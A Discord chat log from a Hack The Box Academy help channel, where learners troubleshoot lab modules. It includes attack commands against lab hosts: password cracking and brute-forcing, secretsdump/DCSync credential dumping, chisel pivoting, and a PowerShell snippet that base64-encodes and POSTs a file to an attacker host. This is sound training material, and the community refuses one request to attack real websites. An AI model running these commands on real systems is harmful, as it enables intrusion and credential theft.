#modules

so

set up your own machine and connect through the VPN

where? i tried doing VirtualBox but im too dumb to figure it out

sure

ill try again

I dont want to sound mean but if thats a hurdle for you right now you may not be ready for htb

ik ik but i dont get what the error means

decent amount of foundational knowledge is pretty necessary, and setting up a local vm is one of em

For the second question of the IMPI module when I try to find the password for the given hash , I get this error afer I typed the following command :

hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Hashfile 'hash.txt' on line 1 (admin:...4a8295c6a9e3b8e4f8b0cb8660419892): Token length exception

I created the 'hash.txt' file myself

https://academy.hackthebox.com/module/112/section/1245

hashcat gets grumpy often if you include a username in there without adding --username

sometimes even then

so do I need to change my hash.txt file at all?

if adding --username doesnt work, try removing the admin: and having JUST the hash

or also try JTR

hello y'all, I'm having issues to achieve the exercise Web Server Pivoting with Rpivot from Pivoting, Tunneling, and Port Forwarding module, a little bit of context, I had set up the server & client.py accordingly, and when I establish the connection to the target the browser is opened but not reachable, receiving a time out error

any idea, clue, thought..!!!

jtr can work too, but its a good idea to learn hashcat quirks for the future

its more powerful with GPU configuration yea

nvm i just figured it out i needed to install ubuntu.iso lol

Got a new issue when I removed the username too.

maybe you could trying creating a username file with only the username in it

idk tho

no

make sure just the hash is in there and youre specifying the right mode

attack common services easy lab and medium lab

wtf

it doesnty make sens

https://hashcat.net/wiki/doku.php?id=example_hashes

guys how does nmap work?

isn't 7300 the right mode for IMPI

call me dumb but... i got into htb yesterday

*IPMI

yes

try to remove "\n" character if its in there

cat hash_too.txt | tr -d '\n' | sponge hash_too.txt

cat hash_too.txt

👍

YES i finally installed VirtualBox !! 😎

lol myb

I'm currently on the metasploit module / Payloads. The Q is "Exploit the Apache Druid service and find the flag.txt file. Submit the contents of this file as the answer."
when I run nmap. I get the following result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

What I'm having a hard time to grasp is. How am I suppose to make the connetion to utlize the exploit for Apache Druid (if it wasn't mentioned in the question), based out of that info?

Am I missing something really obvious in my enumeration?

Anyone else having trouble starting their instance machine on pawnbox

works for me

So strange. I can't ask for help on the academy.htb page because the message block doesn't appear

If you read this you will get to know at least on which port the service is listening so you can try to fingerprint the version:
https://druid.apache.org/docs/latest/tutorials/

another probably "smart" way is when selecting a module from Metasploit you can read the default options. Unless the administrator changed the listening port to something else other than the default one you can find it out and start fingerprinting the service

ok

I think the block in my head right now is more of how do I know what exploit to look for in metasploit, only based out of the nmap enumeration? The question in this case kinda gives away what to look for in metasploit

if that make any sense

I'm no seeing the matrix right now..

trial and error sorta

well it really gives only one option metasploit

matching up versions n such

(in this case at least)

sometimes a metasploit exploit just isnt gunna be the path anyways

Can someone help me? I can't connect to any instance of a pwnbox and I am having issues with contacting support too

is it normal to have

files and counting

why powerview isn't working

.\

does that care?

I think I have always imported it with ./

Hi y'all, who can give me a hand with Web Server Pivoting with Rpivot section from Pivoting module?

🔥

Oh

That one looks cool.

Not sure, but you could give it a try and see if it throws the same error.

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.129.203.10 -u users.list -p pws.list --local-auth
SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\aartjan:liverpool

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.129.203.10 -u users.list -p rockyou.txt --local-auth
SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\aartjan:123456

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.129.203.10 -u users.list -p pws.list
SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\aartjan:liverpool its giving false positive

anyoine know why

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -L users.list -P pws.list smb://10.129.203.10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-21 15:14:53
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 26307 login tries (l:79/p:333), ~26307 tries per task
[DATA] attacking smb://10.129.203.10:445/
[ERROR] invalid reply from target smb://10.129.203.10:445/
and hydra its like this

did you verify the module was actually imported?

All these new web modules are cool. 🤩🔥

smb2

crackmap support smb 2

still giving false postive

ah weird never seen it before try another version of cme

cxan u suggest one

latest always

6.1 i think

@acoustic owl is probably done with soc analyst already

No, not yet

HAHA

This path is also not yet complete

So I definitely still lack knowledge in this field.

how to solve the second question in Navigation in Linux Fundamentals? What is the index number of the "sudoers" file in the "/etc" directory? I tried ls -i and stat commands but it says wrong answer. Pls help me

ls -h to see command help

or man ls

already did that

there you go

but it says "wrong answer"

He said he already tried and it didn't accept the answer

Literally read just above where he shows using stat

i do not think the index of the sudoers file is above 1 million entries

send screenshot of ls -i

anyone who I can ask abuot rpivot

Just do ls -lia

And see if there's a difference

ls -i /etc/sudoers

I'm assuming they're in the /etc/ folder

its weird thats above 1 million

reset the pwnbox?

Are you connected to the machine?

ok

yeah

ait

ok he’s getting the sudoers of pwnbox

I meant are you ssh into the spawned ip

🤣

no

I am connected to my pwnbox

its the sudoers from target

no

That's the problem then

Both answers require you to be ssh into the target

just tested

ok

I'll try

and as i did remember it was below 1 million

Well the first one, not necessarily

It literally instructs you to do so

it works now! thank you

It's called, reading all the instructions on the page

It is not specified that I have to connect to the target

there is just this

Yes

Whenever you see that

Do it

ok

thanks

thats FACTUALLY true

🤣 🤣

Literally that is how you're meant to go through the modules

Otherwise you're just enumerating your own system

anyone, could have any idea what could be wrong here?

will there be a cert for the new SOC Analyst path?

Yes

But has not yet been announced.

how is "SSH to IP with user USER and password PASSWORD" NOT specifying to connect to it??

I thought that I could find answers on my own machine

hello guys

is it alright htb?

ye I get that mixup. Im just confused about the confidence to say it doesnt say to connect to the machine and then say it only has that message to SSH in

anyone who have completed the rpivot exercise, I'm completely stuck and struggling with it..!!!

I'd like to discuss what I did so far and understand what could be going on..!!!

anyone whilling to help..!!!

Forgive me for asking a silly question however, the second part of this is the ntlm hash for the krbtgt account correct(31d6cfe0d16ae931b73c59d7e0c089c0)?

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

sure is

For context, I am doing the Documentation & Reporting Practice Lab module which is part of the HTB CPTS track. The question is

“After achieving Domain Admin, submit the NTLM hash of the KRBTGT account.”

I cracked the NTDS file and found the krbtgt account hash, however it keeps saying "incorrect answer". I don't have any extra spaces in my answer either.

hmmm i'm not sure how similar the labs are for each person, but that's not the hash I had

I have notes on the lab, so if you want a sanity check, you can dm

I believe you, I probably just used the wrong method for retrieving it ig

I used secretsdump

same that's how I cracked the ntds

try DCSync from mimikatz ?

yup just did it and it worked

i dont know if it will return a different value (it should not xd)

should it? wow

im wondering

yeah idk why I got a different answer

im actually concerned xD

if you find out please tell us lmao

will do!

did you use secrets dump like impacket-secretsdump -just-dc-user inlanefreight/KRBTGT inlanefreight/<USER>:<PASSWORD>@172.16.5.5

what i think is that you dumped krbtgt ntlm from another machine

and with dcsync attack it dumped the one from the domain controller

that makes sense

which is the intended from a dcsync attack lol

what is obv is different hashes for the same user = different machines xD

i do not really know if this makes sense, i am far away from that module

but im confused

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

I dun goofed, I used "secretsdump.py -ntds ntds.dit -system SYS Local", went back and retraced my steps

Lol

The path was announced

ahhhh

ok ok cool

it makes sense now

thx!

I think it gave me the accounts whose hashes were stored but not synced. I probably had an outdated krbtgt ticket right? Thanks @fringe shell and @sly dome!

i think so

i cannot find other answer

but still concerned, fk i want to reach those modules!!!!

lets keep working.

yo pups

Man I'm absolutely frothing this platform right now. About half way through CPTS and it's litterally the thing I look forward to each day sitting down to smash out some learning. Admittedly I'm taking it slowly to write good notes and patch my many knowledge gaps (of which there are many ) outside of security in general IT but man, cannot get enough of this shit right now. Can't wait to sit CPTS and hook into SOC. Will be super interesting to see how these certs play out in the job market in the coming years.

Just wanted to say thanks to the peeps in here that seem to be the "regulars" helping everyone out.

bub ?

🤦‍♂️

HELO guysonce again

┌──(shadowalker㉿kali)-[~]
└─$ smbclient -N -L //10.129.203.10

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    Home            Disk      
    IPC$            IPC       Remote IPC

Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.203.10 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
i can list the shares with nul session

but i cannot use smbmap

└─$ smbmap -H 10.129.203.10

________  ___      ___  _______   ___      ___       __         _______

/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "
(: _/ \ \ // |(. |_) 🙂 \ \ // | / \ (. |) 🙂
___ \ /\ /. ||: / /\ /. | /' /\ \ |: /
__/ \ |: . |(| _ \ |: . | // __' \ (| /
/" \ 🙂 |. \ /: ||: |) :)|. \ /: | / / \ \ /|__/
(/ ||_/||(/ ||_/||(/ ___)(_______)

 SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                 https://github.com/ShawnDEvans/smbmap

[] Detected 1 hosts serving SMB
[] Established 0 SMB session(s)

and enum4linux-ng its saying thats is using random username and with every user name its said

what module and section are you working on?

with smbmap u need -u ''

Skill assessment hard lab

Tried to brut force the service

I got nothing

Im trying to use the null session

skill assessment of what module?

Attack common services

hi

what did you try for your brute force?

Crackmap it giving the first cred username/password as true

were you using a user list or a specific username?

User list

With password list

Are you on the first question?

Im not looking into question

Im trying to get was i can without looking into question

Cuz sometimes it will gives you hints

I started the machine

Nmap 2 services looks interesting

Rdp mssql SMB

I started with smb to look what i can get

Hi

hi, who are HTB moderator in this channel, to ask some about Rpivot exercise?

How is it that the firewall does not allow any package to reach the device, but I have a response? This is the basis of the response if there is no package received.

Did you specify the proxy configuration in proxychains file?

hey guys i set up double pivoting in the last module.

and when i did an proxychains nmap, i can see some ports are open.

however after awhile, the ports become close. any idea why?

i.e.: port 22 was open initially. after awhile, i perform nmap again, it showed me close

If you use metasploit for double pivoting, it might be because the connection created by metasploit is not stable

in WEB ATTACKS , Advanced File Disclosure exercise I've used CDATA method but I can't get the flag ,is there a problem in my code ?

Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt
( I have escalated the privileges and am in current domain admins group but still can't read the flag.txt ) can anyone help me ?

are you running an elevated prompt? Anyway worked for me with a reverse shell

elevated prompt ? meaning ?

As admin

If you did everything in that step try to sign off in windows rdp machine

And then rdp back in

i needed to do that, while i was in administrator group i did not have privileges until i did that @young trellis

I did login/logout and also gpupdate /force but also got acces denied

@devout torrent

and also ran the powershell as admin also couldn't get the access

is the lab broken or I am missing something

Maybe restart it and try again, but yea i needed to press signoff in the start menu and then log back in to get it to work

Hey, someone has done "MODERN WEB EXPLOITATION TECHNIQUES - SSRF Basic Filter Bypasses" and available in pm?

DM me

Can anyone help with password mutation please? Described the problem on the forum https://forum.hackthebox.com/t/password-attacks-password-mutations/298653

Hello any one done with coder box?

read #welcome and #rules after that use /verify at #bot-commands and ask that at #boxes

make sure you don't have any issue with both the password.list and custom.rule file

also that's the right command

Hello everyone there will by a python -m http.server in powershell? Im running a github powershell server but i have access not allowed

Hello guys, can anyone help me with this question please as im confused:
ps: I do not want the answer just someone to make it more clear to me to understand

Module: WORKING WITH IDS / IPS
Table of contents: Suricata Rule Development Part 2 (Encrypted Traffic)

Question:

There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer.

if you want to upload file from a target windows machine and if you have rdp you can try updog

How can do a POST request in powershell, im trying a lot of things but nothings work!
Invoke-RestMethod -Uri $url -Method Post -InFile $rutaArchivo

you can do Invoke-WebRequest -Uri $url -Method POST -Body $data

Invoke-WebRequest : Cannot send a content-body with this verb-type.
At line:1 char:1
+ Invoke-WebRequest -Uri http://10.10.14.190:8000/uploads -Body poc.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], ProtocolViolationException
    + FullyQualifiedErrorId : System.Net.ProtocolViolationException,Microsoft.PowerShell.Commands.InvokeWebRequestComm
   and

I think its -OutFile instead of -Body

i.e.: Invoke-WebRequest -Uri http://10.10.14.190:8000/uploads -OutFile poc.txt

is doing a GET

$postParams = @{username='me';moredata='qwerty'}
Invoke-WebRequest -Uri http://example.com/foobar -Method POST -Body $postParams

i want to POST a FILe

This may seem like a bait, but updog is an actual tool

Hi, can someone help me with this Assessment?
Module : Broken Authentication, Default Credentials

I have tried the default username file from seclists and rockyou but can't seem to find the password? Can someone tell me which file to use?

Im using python3 -m uploadserver

i still don't get the updog joke 🤣

hint check one of the given link in that section

also a another hint is you don't need to do any brute forcing

Hello, can somebody give me a tip how to solve : Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag. ? Im getting error: RDP disconnected! 1800 Your computer could not connect to another console session on the remote computer because you already have a console session in progress. in mRemotenG app

xfreerdp /v:10.129.203.122 /u:grace /p:'Pass' /dynamic-resolution

in pass you have to put the password that you obtain in the previous section

Thank you 🙂

Im stuck in this exercise 2 hours is to f*cking

You mean the SCADA Strangelove repo? Used that csv as well, didn't seem to work.

not sure about the name but there is only something like 4 cred for that service

who can help me this https://academy.hackthebox.com/module/113/section/2164

Thanks, was so stuck on hydra that didn't try. Was able to complete now.

You need to b64 encode the file you're trying to upload and store it in a variable and supply it to -Body $b64.

$b64 = [System.convert]::ToBase64String((Get-Content -Path '.\poc.txt' -Encoding Byte))
Invoke-WebRequest -Uri $uri -Method POST -Body $b64

How do I find websites that can be sql injection? Every web that I try it’s not good and it works with sql ? I tried like the module episode

Can someone help Module: Active Directory Enumeration & Attacks, Section: LLMNR/NBT-NS Poisoning - from Windows. I cant capture the NTLMv2 hash with the tools Invoke-Inveigh or Inveigh.exe

the tools are executed correctly?

.\Inveigh.exe is not running, Invoke-Inveigh runs but nothing after 15 min

Restart the box and try it again

i remeber that i was waiting 5 min

hint make sure you are using the right "poisoning" mode

What's the exact command you're running. Would be more helpful-

I have a question, all windows protocols that use ntlm or ntlmv2 are vulnerable to pth attack or there can be restricted?

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y the same from the example

You can't pth with ntlmv2.
As long as there's ntlm authentication, you can pth.
There can be restriction but I don't know the deeps.

How can i know if some protocol (like rdp, or smb) have ntlm authentication?

https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167

This article is great for explaining when pth works

Also checkout the PtH section of the module password attacks

do you mean i need an option for Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

The command seems right, is it running in an elevated shell?

i run it in powershell as user htb-student

is htb-student an administrator in that machine?
Tbh, I don't remember if you need administrator shell for Inveigh to work. But, if you're an administrator, open powershell in administrator and try running it.

your right, thanks

Go to ippsec.rocks and search for SQLi there.
Then you will find machines that are vulnerable to SQLi.

i have a feeling he's talking about actual websites lol

Then I hope for his sake that he participates in a BugBounty program.
If he actually tries to hack his girlfriend's Instagram account, he'll probably get a visit from the police faster than he can hit enter 🤪

Lol

In my country the police didn’t give a shit about hack web

They don’t care

So who can help me ?

I tried like the module

Hi can someone help me with the sqlmap essentials in the final flag? i already found the payload but im doing something wrong..

this is all for ethical hacking my dude... no one in here gonna help ya and continuing will get you a swift ban i imagine

Ahh ok

You're on the wrong server

Ok let’s talk about another thing

The advice on doing bug bounty is so you can do it legit. Police may not care, but doesn't mean you can't be in legal issues for days

You should probably read #welcome and #rules

How do I bypass cloud flare

Thats irrelevant to this channel

So what is the purpose of this channel?

Talking about and giving advice on the academy modules

Ohh ok I have a question

I bought attacking with ffuz

If they could read and apply critical thinking they'd be very upset

But I use parrot is

Is

how to access retired machines? I can't access to it .

You can use fuzz tools like ffuf in parrot

VIP subscription

I don’t have it

You need a subscription on the main plattform

Where I fine it ?

?

pay money?

Google

🤦

Yes

Yes

it’s friday

Also most modules will have a link to the tool in the introduction section

You mean script kiddies have weekend? 🤪

it has to be

I need to do practice related to the OSCP which machine you recommended to me?

the ones from PG

https://www.offsec.com/labs/individual/

in offensive security platform?

yes

did you take the certificate?

nope

for more information refer to the official OffSec server

discord.gg/ offsec

ok. No need to do practice in hack the box?

not at all but no one can stop you

Thank you. I will do their practice.

Hey guys, is they any HackTheBox labs or vm list that focus on getting access?

Search on ippsec.rocks for the desired topic. The website will then show you which machines you can solve for that topic.

Hello! I'm currently doing the CPTS path and I'm stuck at "Attacking Common Applications: Skills Assessment I". I found the bat file, but the only command I can execute is dir. Nothing else works, just returns blank output. Not sure what to do here, can someone give me a hint?

you can dm me

I'm stuck on the Miscellaneous Techniques section of the Windows Privilege Escalation module. Not sure if it's the vague question or me doing something wrong, but it's not accepting any of the answers I provide it. Could someone give me a nudge?

guys is it normal when i try to access the terminal it keeps like loading for some time and then closes?

I'm assuming you mean pwnbox?

no

its not the expected behavior

it just loads and closes

we can’t determine from here your problem

Again this is very limited context

do i give it more cpu?

try in Linux related servers

What vm are you using?

oracle

Could be a cpu issue, ram issue

Could be that the download got corrupted

¯_(ツ)_/¯

everything else works fine but the terminal

wait it says software update

imma install it tbh

Ugh gui update

its a visual update? 💀

No

I'm saying updating through gui

Instead of terminal

¯_(ツ)_/¯

i cant go to the terminal thats what im trying to fix

lol

Yeah lol that's why I'm saying it's the best you got

But more than likely not gonna fix your issue

there's always xterm 👀

😳

as well as the tty

what is that?

the standard X11 terminal emulator

They're having trouble launching a terminal in general

I just completed the introduction module now it wont give me another terminal to use for introduction to Linux module, any way around this 😦

Buy cubes

¯_(ツ)_/¯

Or set up your own vm

loads and closes because yes

Otherwise you're limited to one spawn per day

It's likely you don't have enough resources allocated tbh

do i give him another one?

Yea your system had 8 total so it won't hurt

k

there we go

it didn't work so imma give him x2

it still doesn't work

can anyone lend a hand for attacking enterprise networks? I'm at the Active Directory Compromise module, and I'm supposed to add a fake spn and then kerberoast the user

why don’t you give him everything

¯_(ツ)_/¯

I can't solve "How many total packages are installed on target system? ". I tried apt list | wc -l but it gives wrong answer

apt list —installed

it says 378 but it's still wrong

I'm supremely stuck on the Firewall and IDS/IPS Evasion - Hard Lab from the Network Enumeration with NMAP module; I spent at least 10 hours on this lab and would LOVE some help.

Trying to enumerate attack surface I've run:

-sS -p- -Pn -T4 -n --disable-arp-pings --packet-trace -v --reason

only found TCP 22 & 80 are OPEN. I've checked the saved output for any type=3/code=3 responses to check for filtered traffic that might be worth digging into. I found a port but if I try to add version scannig (-sV) or netcat on that port I get no response.

I've tried considering that the Hard Lab may be building on the Medium Lab and tried enumerating the UDP attack surface which almost immediately gets me locked out due to the limited number of attempts available on the target. Trying a more targeted approach I scanned just UDP 53 and that's apparently closed as well.

I've seen tips from other community members that you should attempt to build on the command used for the Easy Lab (OS Detection) which doesn't appear (to me) to have any meaningful carry over flags that I haven't already tried.

I've also seen tips from the community that indicate that if you down scan from the HTBA provided VM (in browser) that you won't get the correct results. Another SYN Scan from that VM didn't yeild any differences in scans run from my local VM.

Finally I've seen another tip for this lab about making use of proxies to avoid getting locked out???? This seems like a red herring since proxies haven't been covered WRT using NMAP in any practical way and this is only the second module in the entire path; that would be quite the curve ball but maybe I'm being naïve?

I honestly can't tell if I'm missing the point of the lesson, the question is poorly written, there's a bug in the lab, or this is a "stump the chump" scenario and I'm learning I'm a chump.

Can anyone help?

apt list —installed | grep -w “/“ | wc -l

try now

0

idk what's wrong

There are two - in the --installed flag; if you're getting 0 that might be the source of your problem

still does not work

the steps you’re supposed to use for that section have already been given in the section just before the skill assessments

go through it again

what happens if you run apt list --installed | wc -l?

it outputs 738 but I google it and used dpkg to list that and count that and now it outputs 737 which is the right answer but thanks for your help

wc -l might be counting a header row which threw your count off by 1 :/

It would appear that I somehow skipped over this entire lesson in this module....I think there might be a UI bug. Thanks for the tip; I wouldn't have thought to go back and check!

Okay I somehow skipped over 5 lessons in this module?!??!?!??!

I don' t know how I get myself dressed in the morning...

Attacking Common Applications - Skill assessment I
I can run dir command but type is not working to read the flag. I can't run any other command. Please help me.

are you sure you’re in the same directory as the flag?

It is a different directory, and I can see it in dir output. But type command is not working in the current directory and in the destionation directory neither.

||type C:\path to flag ||

this?

Nope. And I can't use type on random file in the current directory.

you can dm me

which channel should I use to ask related to the machine issue?

If i end all the Penetration Tester do i get the certification at the end?

heloo guys on attack common services hard lab

is there any HTB moderator in this group?, cuz I found a mistake/error in the IP addressing described in the Rpivot section diagram.....

what about it?

bro 💀

i enabled the xp_cmdshell to read the file in the linked services

ok.

my question is can i just use this cmnd to read the file without enabling the xp_cmdshell

EXEC('SELECT * FROM OPENROWSET(BULK N''C:\Users\Administrator\Desktop\flag.txt'', SINGLE_CLOB) AS Contents;') AT [LOCAL.TEST.LINKED.SRV];

Curious.. if i need to send a file remotely , how do i do that via python ? i know theres a quick one liner to share curent folder

until I got understood, not you can not....

python3 -m http.server

this aint normal

but im not using xp_cmd shell on the cmnd

from linux to windows or windows to linux

or linux to linux

linux to linux

python3 -m http.server

in the directory you want to shre a file

and on the target machine

it wget http://IP_ADRESS:8000/YOUR_FILE

hey all, im struggling with a strange issue. So I am doing the AD Enumeration and attacks module, got rdp access to host 1, and am trying to import powerview with the following powershell command:
Import-Module C:\path\to\PowerView.ps1
which seems like it completed successfully but then when I try running the command:
Get-DomainUser it says that the command is not found

not sure what i could be doing wrong. The annoying part is im reviewing this module and i've solved it before i just cant remember how 😆

Working on the module "Cracking Into HackTheBox", specifically HTTP methods/codes. Still a bit confused on curl, GET and POST

curl natrually does those get functions, correct? but it also has the option to POST as well?

does that sound accurate?

Correct. There is an -X argument that lets you set the request method

ahhh gotcha. POST is used for login forms etc, but can also be used to send through word docs, pdfs, other forms of binary data?

so how is PUT different?

POST is used to send forms and data, yes. Binary data like documents and pictures is usually sent as multipart/form-data

Burp is a great tool that lets you see exactly what a request looks like

As for PUT, have a look here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT

ive been just using the dev tools on web browser to view those requests

ahhh gotcha

Burp is similar, except with way more features and tools

and you're going to get familiar with it if you continue doing modules and boxes

perfect, very excited to be in this program.

got the undergrad and masters, comptia a+, net, sec, linux

figured it was about time to finally do this

you already did those?

hello

ntlm relays attacks

ntlmrelayx> [*] HTTPD(80): Client requested path: /xml;
[*] HTTPD(80): Connection from 172.16.119.80 controlled, attacking target mssql://*****
[-] HTTPD(80): Exception in HTTP request handler: [('SSL routines', '', 'no protocols available')]

Anyone have the same problem ?

for the crackmapexec module skills assessment, i can't seem to get my local chisel to connect to the server's chisel. in fact, for whatever reason, i can't even ping the server i'm supposed to be able to chisel too. i'm 100% positive it's not a vpn issue, because i can go to other modules with the same VPN file process running and don't have any issues. the advice and commands given in the text don't really seem to help

the command i run on my machine looks like this: sudo ./chisel client 10.129.204.182:8080 socks , the end of my /etc/proxychains.conf looks like this: socks5 127.0.0.1 1080 (with no other i'm not sure if i have the port numbers wrong, but i've tried every possible configuration of 1080 and 8080 in both the chisel command and the /etc/proxychains.conf file.

anyone have an idea of where i'm making a mistake?

Dammn coder box its getting in ny nerves

Hello mates

i'd recommend - https://academy.hackthebox.com/module/details/158
||try adding a -v after client||

read #welcome and verify your account.
if you need help with boxes, you'll need to verify your account and go to #boxes

Hey, im on Active Directory Enumeration & Attacks: Privileged Access i cant connect to the ssh: "open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!."

why are you trying to ssh? it says rdp

i need to run mssqlclient.py for the last question

Can someone check if the ssh is working?

i'm checking right now to see what i did

thought you were on the first part

thank you very much

this at least gives a "bound proxy" but i still have the "no route to host" error

what command did you use to setup the server?

i had an issue to, rereading and redoing the lab to verify i didn't miss anything

hm its strange

hello guys, i'm in the pivoting module - SOCKS5 TUNNELING WITH CHISEL, this error apear when i run ./chisel in the server, someone knows who i solve this?

statically compile it

golang changed up some of its compilation stuff

CGOENABLED=0 go build -ldflags="-s -w -linkmode 'external' -extldflags '-static'"

can I send u DM?

nah im working

I did the homework of providing how to statically link it, you should be good to go from there

./chisel server --reverse with the output screenshot attached

I got it here, thanks bro

you set up a listener on 8080, why are you trying to connect to 1080 on your client?
your issue was the absense of -v, connecting to the wrong port, and setting up a reverse connection wrong

i still fail to connect to the chisel server with sudo ./chisel client -v 10.129.204.182:8080 socksthough, i have the listener setup, and ive tried both using port 1080 and port 8080 in the /etc/proxychains4.conf file

you set up a --reverse proxy on the server
so have to specify the same on the client
./chisel client -v 10.129.204.182:8080 R:socks

hello

Anyone could help me sort out where I am being wrong on my metasploit set-up for WINDOWS PRIVILEGE ESCALATION - Windows Server

Someone can help me? Module Windows Privilege Escalation section "Citrix Breakout".
When i try to run the smbserver in my ubuntu machine(connection through RDP protocol), doesn't found the impacket module. I tried to install the impacket module in the ubuntu machine but doesn't have internet access so I can't do nothing.

Solved

I'm dumb 💀

Working On Intro to Python 3 , Stuck on Code Block2 in the first set of Questions , can anyone help on this , In "Code block 2" the blank should be filled with what, to output all numbers in a terminal? ????

Its In Conditional Statements and Loops Module

take a look at the for-each loop section above

THANKS

WILL DO

for AD Enumeration and Attacks, how did yall bypass the antivirus to get ||MimiKatz|| working on the second skills assessment? I had to do the attack manually with file transfer over ||nc|| but wondering if anyone managed to get it another way

guys need anyone to help me to solve this lab please "Firewall and IDS/IPS Evasion - Hard Lab "

hTB academy is really slow today. is anyone else having the same experience ?

guys?

My notes only say I had a meterpreter shell as admin at that point. It doesn't mention anything about evasion.

use ./<filename> for files under current directory

guys....

i have connection

btw

some targets doesn't reply pings

so what do i do

try -Pn as mentioned in the error message

which module are you in

module?

the title

this?

hello?

this place is for the htb academy

i believe you have other servers to ask questions for boxes

is it just me or is HTB academy very slow today?

Stuck on web attacks skill assessment

||trying to change admins password with the idor vuln but every time i try it says access denied||

anyone know why i can't get nc.exe to copy over even though i get the 200 and the file shows up when i do a ls or dir it shows nc.exe with 0 bytes

hi guys

im new can anyone guide me through this?

through what

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

without any context this this sound like you are having a stroke

ight

hint you'll need 2 thing for that

||uuid|| and a ||token||

That's what I was thinking but I'm struggling with the second part. Now that I know that I was on the right track I'll keep looking.

Thanks

How do I mark a large message as a spoiler? 😭

shoot me a dm those definitely too much spoiler

even with a spoiler tag admin would not be happy with that much spoiler

I see

hey guys im new here could someone help meout

If you say in which module, which section, which question you need help and then say what you have already tried, your chances of getting help are very good.

Is there a way I can buy cubes or acess to a specific course without subscribing, I have 4 courses in mind that I can access all behind the student subscription and then one I want to do which is Tier III, and I want to only get that one and then I'll probably be done with academy and take an exam

Yes, you can buy cubes without subscription

https://academy.hackthebox.com/billing

it is actually cheaper for me to subscribe and get 500 cubes for the web exploitation course than me just buy 500 cubes.

77 aud for 500 cubes, or purchase gold and just cancel it and that's $67

whack

Yes, the subscription is definitely cheaper

i went thru the step by step and when i try and copy the nc.exe after setting up the http server i get the 200 on the http server terminal but when i list out the directory where i copy it to i get a length of 0... for the beginners Archtype

Hello, I'm just curious about a part in the Hard Lab in Password Attacks. How did y'all get a particular file off one of the target hosts? I successfully did it by encoding/decoding base64. Is that what everyone else did? Ty

id post a screenshot but ...

read #welcome and #rules after that use /verify at #bot-commands to verify your account and send screenshot here

the ||vhd|| file? there is multiple way to get that from using /drive tag in xfreerdp or a tool like updog

i pulled a binary from github to try an copy it over and i tried to push the nc.exe from the windows binaries already on the kali box

which module and section are you on?

when i try an pull the nc.exe file from my http.server i get the 200 but in the sql box it gets stuck

Archtype

tier 2

ask that in #starting-point

this channel is for HTB academy modules not main platform

Module : Attacking Common Services

Attacking Email Services
i got the username m****** and i trayed to brute force for the password using the pws.txt and rockyou.txt
on both smtp and pop3
i'am stuck in this easy task

U couldnt brut force ?

Can semd me the whole cmnd

i need help with file inclusion module

For the Footprinting lab hard...when you do the nmap scan, how many ports are you all getting. I am just getting five , but when I look at some writeups for this lab, I am told that there are more than just five parts. I included '-p-' and '-p 1-65535' in my scans and I still get the same five ports. Not finding any snmp ports

what is wrong with my shell it doesnt work

have you tried a udp scan?

is there any way to refund a module ?
this Broken Authentication is making me cry

why its so dam hard

Nope. I now just learn that the '-p-' nmap flag doesn't include udp ports. Thats wild to me

yes😉

i mean you can ask support but i doubts it 🤷‍♂️

and yes some module will kick you in the ball

u are laughing but im crying

I want to learn Server Side now

hardcore

hardcore

you will get used to being railed by modules if you will be on the academy for a while

its been 44% till now

help pls

why does my shell not work

you have to give us more information than that

i sucessfully uploaded a simple web shell on target server but for some reason it doesnt work

i used log poisoning to create a more permanent web shell here

but when i try to use that shell it doesnt "work"

don’t try uploading a shell first.. try to read phpinfo and then upload a shell. phpinfo will tell you what functions are blocked as well

